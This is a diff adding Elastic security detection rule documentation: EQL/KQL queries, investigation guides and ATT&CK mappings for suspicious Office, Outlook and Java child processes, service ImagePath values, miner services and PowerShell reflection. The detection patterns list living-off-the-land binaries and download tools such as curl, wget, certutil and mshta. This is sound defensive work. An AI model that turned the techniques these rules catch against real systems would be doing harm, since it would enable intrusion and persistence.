ID: T1053 +** Reference URL: https://attack.mitre.org/techniques/T1053/ +* Sub-technique: +** Name: Cron +** ID: T1053.003 +** Reference URL: https://attack.mitre.org/techniques/T1053/003/ +* Tactic: +** Name: Privilege Escalation +** ID: TA0004 +** Reference URL: https://attack.mitre.org/tactics/TA0004/ +* Technique: +** Name: Abuse Elevation Control Mechanism +** ID: T1548 +** Reference URL: https://attack.mitre.org/techniques/T1548/ +* Sub-technique: +** Name: Sudo and Sudo Caching +** ID: T1548.003 +** Reference URL: https://attack.mitre.org/techniques/T1548/003/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-suspicious-image-load-taskschd-dll-from-ms-office.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-suspicious-image-load-taskschd-dll-from-ms-office.asciidoc new file mode 100644 index 0000000000..30eeff32f1 --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-suspicious-image-load-taskschd-dll-from-ms-office.asciidoc @@ -0,0 +1,94 @@ +[[prebuilt-rule-8-10-5-suspicious-image-load-taskschd-dll-from-ms-office]] +=== Suspicious Image Load (taskschd.dll) from MS Office + +Identifies a suspicious image load (taskschd.dll) from Microsoft Office processes. This behavior may indicate adversarial activity where a scheduled task is configured via Windows Component Object Model (COM). This technique can be used to configure persistence and evade monitoring by avoiding the usage of the traditional Windows binary (schtasks.exe) used to manage scheduled tasks. + +*Rule type*: eql + +*Rule indices*: + +* winlogbeat-* +* logs-endpoint.events.* +* logs-windows.* +* endgame-* + +*Severity*: low + +*Risk score*: 21 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <<rule-schedule, `Additional look-back time`>>) + +*Maximum alerts per execution*: 100 + +*References*: + +* https://medium.com/threatpunter/detecting-adversary-tradecraft-with-image-load-event-logging-and-eql-8de93338c16 +* https://www.clearskysec.com/wp-content/uploads/2020/10/Operation-Quicksand.pdf + +*Tags*: + +* Domain: Endpoint +* OS: Windows +* Use Case: Threat Detection +* Tactic: Persistence +* Tactic: Execution +* Data Source: Elastic Endgame +* Data Source: Elastic Defend + +*Version*: 105 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Investigation guide + + +[source, markdown] +---------------------------------- + +---------------------------------- + +==== Rule query + + +[source, js] +---------------------------------- +any where host.os.type == "windows" and + (event.category : ("library", "driver") or (event.category == "process" and event.action : "Image loaded*")) and + process.name : ("WINWORD.EXE", "EXCEL.EXE", "POWERPNT.EXE", "MSPUB.EXE", "MSACCESS.EXE") and + (dll.name : "taskschd.dll" or file.name : "taskschd.dll") + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Persistence +** ID: TA0003 +** Reference URL: https://attack.mitre.org/tactics/TA0003/ +* Technique: +** Name: Scheduled Task/Job +** ID: T1053 +** Reference URL: https://attack.mitre.org/techniques/T1053/ +* Sub-technique: +** Name: Scheduled Task +** ID: T1053.005 +** Reference URL: https://attack.mitre.org/techniques/T1053/005/ +* Tactic: +** Name: Execution +** ID: TA0002 +** Reference URL: https://attack.mitre.org/tactics/TA0002/ +* Technique: +** Name: Scheduled Task/Job +** ID: T1053 +** Reference URL: https://attack.mitre.org/techniques/T1053/ +* Sub-technique: +** Name: Scheduled Task +** ID: T1053.005 +** Reference URL: https://attack.mitre.org/techniques/T1053/005/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-suspicious-imagepath-service-creation.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-suspicious-imagepath-service-creation.asciidoc new file mode 100644 index 0000000000..ae3848b3d6 --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-suspicious-imagepath-service-creation.asciidoc @@ -0,0 +1,79 @@ +[[prebuilt-rule-8-10-5-suspicious-imagepath-service-creation]] +=== Suspicious ImagePath Service Creation + +Identifies the creation of a suspicious ImagePath value. This could be an indication of an adversary attempting to stealthily persist or escalate privileges through abnormal service creation. + +*Rule type*: eql + +*Rule indices*: + +* logs-endpoint.events.* +* endgame-* + +*Severity*: high + +*Risk score*: 73 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <<rule-schedule, `Additional look-back time`>>) + +*Maximum alerts per execution*: 100 + +*References*: None + +*Tags*: + +* Domain: Endpoint +* OS: Windows +* Use Case: Threat Detection +* Tactic: Persistence +* Tactic: Defense Evasion +* Data Source: Elastic Endgame +* Data Source: Elastic Defend + +*Version*: 105 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Rule query + + +[source, js] +---------------------------------- +registry where host.os.type == "windows" and registry.path : ( + "HKLM\\SYSTEM\\ControlSet*\\Services\\*\\ImagePath", + "\\REGISTRY\\MACHINE\\SYSTEM\\ControlSet*\\Services\\*\\ImagePath" + ) and + /* add suspicious registry ImagePath values here */ + registry.data.strings : ("%COMSPEC%*", "*\\.\\pipe\\*") + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Persistence +** ID: TA0003 +** Reference URL: https://attack.mitre.org/tactics/TA0003/ +* Technique: +** Name: Create or Modify System Process +** ID: T1543 +** Reference URL: https://attack.mitre.org/techniques/T1543/ +* Sub-technique: +** Name: Windows Service +** ID: T1543.003 +** Reference URL: https://attack.mitre.org/techniques/T1543/003/ +* Tactic: +** Name: Defense Evasion +** ID: TA0005 +** Reference URL: https://attack.mitre.org/tactics/TA0005/ +* Technique: +** Name: Modify Registry +** ID: T1112 +** Reference URL: https://attack.mitre.org/techniques/T1112/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-suspicious-java-child-process.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-suspicious-java-child-process.asciidoc new file mode 100644 index 0000000000..2817d399bf --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-suspicious-java-child-process.asciidoc @@ -0,0 +1,110 @@ +[[prebuilt-rule-8-10-5-suspicious-java-child-process]] +=== Suspicious JAVA Child Process + +Identifies suspicious child processes of the Java interpreter process. This may indicate an attempt to execute a malicious JAR file or an exploitation attempt via a JAVA specific vulnerability. + +*Rule type*: new_terms + +*Rule indices*: + +* auditbeat-* +* logs-endpoint.events.* + +*Severity*: medium + +*Risk score*: 47 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <<rule-schedule, `Additional look-back time`>>) + +*Maximum alerts per execution*: 100 + +*References*: + +* https://www.lunasec.io/docs/blog/log4j-zero-day/ +* https://github.com/christophetd/log4shell-vulnerable-app +* https://www.blackhat.com/docs/us-16/materials/us-16-Munoz-A-Journey-From-JNDI-LDAP-Manipulation-To-RCE.pdf +* https://www.elastic.co/security-labs/detecting-log4j2-with-elastic-security +* https://www.elastic.co/security-labs/analysis-of-log4shell-cve-2021-45046 + +*Tags*: + +* Domain: Endpoint +* OS: Linux +* OS: macOS +* Use Case: Threat Detection +* Tactic: Execution +* Resources: Investigation Guide +* Use Case: Vulnerability +* Data Source: Elastic Defend + +*Version*: 205 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Investigation guide + + +[source, markdown] +---------------------------------- +## Triage and analysis + +### Investigating Suspicious Java Child Process + +This rule identifies a suspicious child process of the Java interpreter process. It may indicate an attempt to execute a malicious JAR file or an exploitation attempt via a Java specific vulnerability. + +#### Possible investigation steps + +- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence and whether they are located in expected locations. +- Investigate other alerts associated with the user/host during the past 48 hours. +- Investigate any abnormal account behavior, such as command executions, file creations or modifications, and network connections. +- Investigate any abnormal behavior by the subject process such as network connections, file modifications, and any spawned child processes. +- Examine the command line to determine if the command executed is potentially harmful or malicious. +- Inspect the host for suspicious or abnormal behavior in the alert timeframe. + +### False positive analysis + +- If this activity is expected and noisy in your environment, consider adding exceptions — preferably with a combination of process and command line conditions. + +### Response and remediation + +- Initiate the incident response process based on the outcome of the triage. +- Isolate the involved hosts to prevent further post-compromise behavior. +- Remove and block malicious artifacts identified during triage. +- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services. +- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components. +- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector. +- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR). +---------------------------------- + +==== Rule query + + +[source, js] +---------------------------------- +event.category:process and event.type:("start" or "process_started") and process.parent.name:"java" and process.name:( + "sh" or "bash" or "dash" or "ksh" or "tcsh" or "zsh" or "curl" or "wget" +) + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Execution +** ID: TA0002 +** Reference URL: https://attack.mitre.org/tactics/TA0002/ +* Technique: +** Name: Command and Scripting Interpreter +** ID: T1059 +** Reference URL: https://attack.mitre.org/techniques/T1059/ +* Sub-technique: +** Name: JavaScript +** ID: T1059.007 +** Reference URL: https://attack.mitre.org/techniques/T1059/007/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-suspicious-managed-code-hosting-process.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-suspicious-managed-code-hosting-process.asciidoc new file mode 100644 index 0000000000..eed959d5c9 --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-suspicious-managed-code-hosting-process.asciidoc @@ -0,0 +1,74 @@ +[[prebuilt-rule-8-10-5-suspicious-managed-code-hosting-process]] +=== Suspicious Managed Code Hosting Process + +Identifies a suspicious managed code hosting process which could indicate code injection or other form of suspicious code execution. + +*Rule type*: eql + +*Rule indices*: + +* winlogbeat-* +* logs-endpoint.events.* +* logs-windows.* + +*Severity*: high + +*Risk score*: 73 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <<rule-schedule, `Additional look-back time`>>) + +*Maximum alerts per execution*: 100 + +*References*: + +* https://blog.menasec.net/2019/07/interesting-difr-traces-of-net-clr.html + +*Tags*: + +* Domain: Endpoint +* OS: Windows +* Use Case: Threat Detection +* Tactic: Defense Evasion +* Data Source: Elastic Defend + +*Version*: 105 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Rule query + + +[source, js] +---------------------------------- +sequence by process.entity_id with maxspan=5m + [process where host.os.type == "windows" and event.type == "start" and + process.name : ("wscript.exe", "cscript.exe", "mshta.exe", "wmic.exe", "regsvr32.exe", "svchost.exe", "dllhost.exe", "cmstp.exe")] + [file where host.os.type == "windows" and event.type != "deletion" and + file.name : ("wscript.exe.log", + "cscript.exe.log", + "mshta.exe.log", + "wmic.exe.log", + "svchost.exe.log", + "dllhost.exe.log", + "cmstp.exe.log", + "regsvr32.exe.log")] + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Defense Evasion +** ID: TA0005 +** Reference URL: https://attack.mitre.org/tactics/TA0005/ +* Technique: +** Name: Process Injection +** ID: T1055 +** Reference URL: https://attack.mitre.org/techniques/T1055/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-suspicious-mining-process-creation-event.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-suspicious-mining-process-creation-event.asciidoc new file mode 100644 index 0000000000..f43d0d1042 --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-suspicious-mining-process-creation-event.asciidoc @@ -0,0 +1,67 @@ +[[prebuilt-rule-8-10-5-suspicious-mining-process-creation-event]] +=== Suspicious Mining Process Creation Event + +Identifies service creation events of common mining services, possibly indicating the infection of a system with a cryptominer. + +*Rule type*: eql + +*Rule indices*: + +* logs-endpoint.events.* +* endgame-* + +*Severity*: medium + +*Risk score*: 47 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <<rule-schedule, `Additional look-back time`>>) + +*Maximum alerts per execution*: 100 + +*References*: None + +*Tags*: + +* Domain: Endpoint +* OS: Linux +* Use Case: Threat Detection +* Tactic: Execution +* Data Source: Elastic Endgame +* Data Source: Elastic Defend + +*Version*: 4 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Rule query + + +[source, js] +---------------------------------- +file where host.os.type == "linux" and event.type == "creation" and +event.action : ("creation", "file_create_event") and +file.name : ("aliyun.service", "moneroocean_miner.service", "c3pool_miner.service", "pnsd.service", "apache4.service", "pastebin.service", "xvf.service") + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Execution +** ID: TA0002 +** Reference URL: https://attack.mitre.org/tactics/TA0002/ +* Technique: +** Name: Command and Scripting Interpreter +** ID: T1059 +** Reference URL: https://attack.mitre.org/techniques/T1059/ +* Sub-technique: +** Name: Unix Shell +** ID: T1059.004 +** Reference URL: https://attack.mitre.org/techniques/T1059/004/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-suspicious-ms-office-child-process.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-suspicious-ms-office-child-process.asciidoc new file mode 100644 index 0000000000..7a21c1b638 --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-suspicious-ms-office-child-process.asciidoc @@ -0,0 +1,157 @@ +[[prebuilt-rule-8-10-5-suspicious-ms-office-child-process]] +=== Suspicious MS Office Child Process + +Identifies suspicious child processes of frequently targeted Microsoft Office applications (Word, PowerPoint, Excel). These child processes are often launched during exploitation of Office applications or from documents with malicious macros. + +*Rule type*: eql + +*Rule indices*: + +* winlogbeat-* +* logs-endpoint.events.* +* logs-windows.* +* endgame-* + +*Severity*: medium + +*Risk score*: 47 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <<rule-schedule, `Additional look-back time`>>) + +*Maximum alerts per execution*: 100 + +*References*: + +* https://www.elastic.co/blog/vulnerability-summary-follina + +*Tags*: + +* Domain: Endpoint +* OS: Windows +* Use Case: Threat Detection +* Tactic: Initial Access +* Tactic: Defense Evasion +* Tactic: Execution +* Resources: Investigation Guide +* Data Source: Elastic Endgame +* Data Source: Elastic Defend + +*Version*: 108 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Investigation guide + + +[source, markdown] +---------------------------------- +## Triage and analysis + +### Investigating Suspicious MS Office Child Process + +Microsoft Office (MS Office) is a suite of applications designed to help with productivity and completing common tasks on a computer. You can create and edit documents containing text and images, work with data in spreadsheets and databases, and create presentations and posters. As it is some of the most-used software across companies, MS Office is frequently targeted for initial access. It also has a wide variety of capabilities that attackers can take advantage of. + +This rule looks for suspicious processes spawned by MS Office programs. This is generally the result of the execution of malicious documents. + +#### Possible investigation steps + +- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures. +- Investigate other alerts associated with the user/host during the past 48 hours. +- Retrieve MS Office documents received and opened by the user that could cause this behavior. Common locations include, but are not limited to, the Downloads and Document folders and the folder configured at the email client. +- Determine if the collected files are malicious: + - Use a private sandboxed malware analysis system to perform analysis. + - Observe and collect information about the following activities: + - Attempts to contact external domains and addresses. + - File and registry access, modification, and creation activities. + - Service creation and launch activities. + - Scheduled task creation. + - Use the PowerShell Get-FileHash cmdlet to get the files' SHA-256 hash values. + - Search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc. + +### False positive analysis + +- This activity is unlikely to happen legitimately. Benign true positives (B-TPs) can be added as exceptions if necessary. + +### Response and remediation + +- Initiate the incident response process based on the outcome of the triage. +- Isolate the involved host to prevent further post-compromise behavior. +- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services. +- If the triage identified malware, search the environment for additional compromised hosts. + - Implement temporary network rules, procedures, and segmentation to contain the malware. + - Stop suspicious processes. + - Immediately block the identified indicators of compromise (IoCs). + - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system. +- Remove and block malicious artifacts identified during triage. +- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components. +- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector. + - If the malicious file was delivered via phishing: + - Block the email sender from sending future emails. + - Block the malicious web pages. + - Remove emails from the sender from mailboxes. + - Consider improvements to the security awareness program. +- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR). +---------------------------------- + +==== Rule query + + +[source, js] +---------------------------------- +process where host.os.type == "windows" and event.type == "start" and + process.parent.name : ("eqnedt32.exe", "excel.exe", "fltldr.exe", "msaccess.exe", "mspub.exe", "powerpnt.exe", "winword.exe", "outlook.exe") and + process.name : ("Microsoft.Workflow.Compiler.exe", "arp.exe", "atbroker.exe", "bginfo.exe", "bitsadmin.exe", "cdb.exe", "certutil.exe", + "cmd.exe", "cmstp.exe", "control.exe", "cscript.exe", "csi.exe", "dnx.exe", "dsget.exe", "dsquery.exe", "forfiles.exe", + "fsi.exe", "ftp.exe", "gpresult.exe", "hostname.exe", "ieexec.exe", "iexpress.exe", "installutil.exe", "ipconfig.exe", + "mshta.exe", "msxsl.exe", "nbtstat.exe", "net.exe", "net1.exe", "netsh.exe", "netstat.exe", "nltest.exe", "odbcconf.exe", + "ping.exe", "powershell.exe", "pwsh.exe", "qprocess.exe", "quser.exe", "qwinsta.exe", "rcsi.exe", "reg.exe", "regasm.exe", + "regsvcs.exe", "regsvr32.exe", "sc.exe", "schtasks.exe", "systeminfo.exe", "tasklist.exe", "tracert.exe", "whoami.exe", + "wmic.exe", "wscript.exe", "xwizard.exe", "explorer.exe", "rundll32.exe", "hh.exe", "msdt.exe") + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Initial Access +** ID: TA0001 +** Reference URL: https://attack.mitre.org/tactics/TA0001/ +* Technique: +** Name: Phishing +** ID: T1566 +** Reference URL: https://attack.mitre.org/techniques/T1566/ +* Sub-technique: +** Name: Spearphishing Attachment +** ID: T1566.001 +** Reference URL: https://attack.mitre.org/techniques/T1566/001/ +* Tactic: +** Name: Execution +** ID: TA0002 +** Reference URL: https://attack.mitre.org/tactics/TA0002/ +* Technique: +** Name: Command and Scripting Interpreter +** ID: T1059 +** Reference URL: https://attack.mitre.org/techniques/T1059/ +* Sub-technique: +** Name: PowerShell +** ID: T1059.001 +** Reference URL: https://attack.mitre.org/techniques/T1059/001/ +* Sub-technique: +** Name: Windows Command Shell +** ID: T1059.003 +** Reference URL: https://attack.mitre.org/techniques/T1059/003/ +* Tactic: +** Name: Defense Evasion +** ID: TA0005 +** Reference URL: https://attack.mitre.org/tactics/TA0005/ +* Technique: +** Name: System Binary Proxy Execution +** ID: T1218 +** Reference URL: https://attack.mitre.org/techniques/T1218/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-suspicious-ms-outlook-child-process.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-suspicious-ms-outlook-child-process.asciidoc new file mode 100644 index 0000000000..6d34ee3055 --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-suspicious-ms-outlook-child-process.asciidoc @@ -0,0 +1,156 @@ +[[prebuilt-rule-8-10-5-suspicious-ms-outlook-child-process]] +=== Suspicious MS Outlook Child Process + +Identifies suspicious child processes of Microsoft Outlook. These child processes are often associated with spear phishing activity. + +*Rule type*: eql + +*Rule indices*: + +* winlogbeat-* +* logs-endpoint.events.* +* logs-windows.* +* endgame-* + +*Severity*: low + +*Risk score*: 21 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <<rule-schedule, `Additional look-back time`>>) + +*Maximum alerts per execution*: 100 + +*References*: None + +*Tags*: + +* Domain: Endpoint +* OS: Windows +* Use Case: Threat Detection +* Tactic: Initial Access +* Tactic: Defense Evasion +* Tactic: Execution +* Resources: Investigation Guide +* Data Source: Elastic Endgame +* Data Source: Elastic Defend + +*Version*: 107 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Investigation guide + + +[source, markdown] +---------------------------------- +## Triage and analysis + +### Investigating Suspicious MS Outlook Child Process + +Microsoft Outlook is an email client that provides contact, email calendar, and task management features. Outlook is widely used, either standalone or as part of the Office suite. + +This rule looks for suspicious processes spawned by MS Outlook, which can be the result of the execution of malicious documents and/or exploitation for initial access. + +#### Possible investigation steps + +- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures. +- Investigate other alerts associated with the user/host during the past 48 hours. +- Retrieve recently opened files received via email and opened by the user that could cause this behavior. Common locations include but are not limited to, the Downloads and Document folders and the folder configured at the email client. +- Determine if the collected files are malicious: + - Use a private sandboxed malware analysis system to perform analysis. + - Observe and collect information about the following activities: + - Attempts to contact external domains and addresses. + - File and registry access, modification, and creation activities. + - Service creation and launch activities. + - Scheduled task creation. + - Use the PowerShell Get-FileHash cmdlet to get the files' SHA-256 hash values. + - Search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc. + +### False positive analysis + +- This activity is unlikely to happen legitimately. Benign true positives (B-TPs) can be added as exceptions if necessary. + +### Response and remediation + +- Initiate the incident response process based on the outcome of the triage. +- Isolate the involved host to prevent further post-compromise behavior. +- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services. +- If the triage identified malware, search the environment for additional compromised hosts. + - Implement temporary network rules, procedures, and segmentation to contain the malware. + - Stop suspicious processes. + - Immediately block the identified indicators of compromise (IoCs). + - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system. +- Remove and block malicious artifacts identified during triage. +- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components. +- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector. + - If the malicious file was delivered via phishing: + - Block the email sender from sending future emails. + - Block the malicious web pages. + - Remove emails from the sender from mailboxes. + - Consider improvements to the security awareness program. +- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR). +---------------------------------- + +==== Rule query + + +[source, js] +---------------------------------- +process where host.os.type == "windows" and event.type == "start" and + process.parent.name : "outlook.exe" and + process.name : ("Microsoft.Workflow.Compiler.exe", "arp.exe", "atbroker.exe", "bginfo.exe", "bitsadmin.exe", + "cdb.exe", "certutil.exe", "cmd.exe", "cmstp.exe", "cscript.exe", "csi.exe", "dnx.exe", "dsget.exe", + "dsquery.exe", "forfiles.exe", "fsi.exe", "ftp.exe", "gpresult.exe", "hostname.exe", "ieexec.exe", + "iexpress.exe", "installutil.exe", "ipconfig.exe", "mshta.exe", "msxsl.exe", "nbtstat.exe", "net.exe", + "net1.exe", "netsh.exe", "netstat.exe", "nltest.exe", "odbcconf.exe", "ping.exe", "powershell.exe", + "pwsh.exe", "qprocess.exe", "quser.exe", "qwinsta.exe", "rcsi.exe", "reg.exe", "regasm.exe", + "regsvcs.exe", "regsvr32.exe", "sc.exe", "schtasks.exe", "systeminfo.exe", "tasklist.exe", + "tracert.exe", "whoami.exe", "wmic.exe", "wscript.exe", "xwizard.exe") + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Initial Access +** ID: TA0001 +** Reference URL: https://attack.mitre.org/tactics/TA0001/ +* Technique: +** Name: Phishing +** ID: T1566 +** Reference URL: https://attack.mitre.org/techniques/T1566/ +* Sub-technique: +** Name: Spearphishing Attachment +** ID: T1566.001 +** Reference URL: https://attack.mitre.org/techniques/T1566/001/ +* Tactic: +** Name: Execution +** ID: TA0002 +** Reference URL: https://attack.mitre.org/tactics/TA0002/ +* Technique: +** Name: Command and Scripting Interpreter +** ID: T1059 +** Reference URL: https://attack.mitre.org/techniques/T1059/ +* Sub-technique: +** Name: PowerShell +** ID: T1059.001 +** Reference URL: https://attack.mitre.org/techniques/T1059/001/ +* Sub-technique: +** Name: Windows Command Shell +** ID: T1059.003 +** Reference URL: https://attack.mitre.org/techniques/T1059/003/ +* Tactic: +** Name: Defense Evasion +** ID: TA0005 +** Reference URL: https://attack.mitre.org/tactics/TA0005/ +* Technique: +** Name: System Binary Proxy Execution +** ID: T1218 +** Reference URL: https://attack.mitre.org/techniques/T1218/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-suspicious-net-code-compilation.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-suspicious-net-code-compilation.asciidoc new file mode 100644 index 0000000000..472cb5a646 --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-suspicious-net-code-compilation.asciidoc @@ -0,0 +1,90 @@ +[[prebuilt-rule-8-10-5-suspicious-net-code-compilation]] +=== Suspicious .NET Code Compilation + +Identifies executions of .NET compilers with suspicious parent processes, which can indicate an attacker's attempt to compile code after delivery in order to bypass security mechanisms. + +*Rule type*: eql + +*Rule indices*: + +* winlogbeat-* +* logs-endpoint.events.* +* logs-windows.* +* endgame-* + +*Severity*: medium + +*Risk score*: 47 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <<rule-schedule, `Additional look-back time`>>) + +*Maximum alerts per execution*: 100 + +*References*: None + +*Tags*: + +* Domain: Endpoint +* OS: Windows +* Use Case: Threat Detection +* Tactic: Defense Evasion +* Tactic: Execution +* Data Source: Elastic Endgame +* Data Source: Elastic Defend + +*Version*: 107 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Investigation guide + + +[source, markdown] +---------------------------------- + +---------------------------------- + +==== Rule query + + +[source, js] +---------------------------------- +process where host.os.type == "windows" and event.type == "start" and + process.name : ("csc.exe", "vbc.exe") and + process.parent.name : ("wscript.exe", "mshta.exe", "cscript.exe", "wmic.exe", "svchost.exe", "rundll32.exe", "cmstp.exe", "regsvr32.exe") + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Defense Evasion +** ID: TA0005 +** Reference URL: https://attack.mitre.org/tactics/TA0005/ +* Technique: +** Name: Obfuscated Files or Information +** ID: T1027 +** Reference URL: https://attack.mitre.org/techniques/T1027/ +* Sub-technique: +** Name: Compile After Delivery +** ID: T1027.004 +** Reference URL: https://attack.mitre.org/techniques/T1027/004/ +* Tactic: +** Name: Execution +** ID: TA0002 +** Reference URL: https://attack.mitre.org/tactics/TA0002/ +* Technique: +** Name: Command and Scripting Interpreter +** ID: T1059 +** Reference URL: https://attack.mitre.org/techniques/T1059/ +* Sub-technique: +** Name: Visual Basic +** ID: T1059.005 +** Reference URL: https://attack.mitre.org/techniques/T1059/005/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-suspicious-net-reflection-via-powershell.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-suspicious-net-reflection-via-powershell.asciidoc new file mode 100644 index 0000000000..8f9dc464ad --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-suspicious-net-reflection-via-powershell.asciidoc @@ -0,0 +1,166 @@ +[[prebuilt-rule-8-10-5-suspicious-net-reflection-via-powershell]] +=== Suspicious .NET Reflection via PowerShell + +Detects the use of Reflection.Assembly to load PEs and DLLs in memory in PowerShell scripts. Attackers use this method to load executables and DLLs without writing to the disk, bypassing security solutions. + +*Rule type*: query + +*Rule indices*: + +* winlogbeat-* +* logs-windows.* + +*Severity*: medium + +*Risk score*: 47 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <<rule-schedule, `Additional look-back time`>>) + +*Maximum alerts per execution*: 100 + +*References*: + +* https://docs.microsoft.com/en-us/dotnet/api/system.reflection.assembly.load + +*Tags*: + +* Domain: Endpoint +* OS: Windows +* Use Case: Threat Detection +* Tactic: Defense Evasion +* Tactic: Execution +* Resources: Investigation Guide +* Data Source: PowerShell Logs + +*Version*: 109 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Investigation guide + + +[source, markdown] +---------------------------------- +## Triage and analysis + +### Investigating Suspicious .NET Reflection via PowerShell + +PowerShell is one of the main tools system administrators use for automation, report routines, and other tasks. This makes it available for use in various environments, and creates an attractive way for attackers to execute code. + +Attackers can use .NET reflection to load PEs and DLLs in memory. These payloads are commonly embedded in the script, which can circumvent file-based security protections. + +> **Note**: +> This investigation guide uses the {security-guide}/security/master/invest-guide-run-osquery.html[Osquery Markdown Plugin] introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this 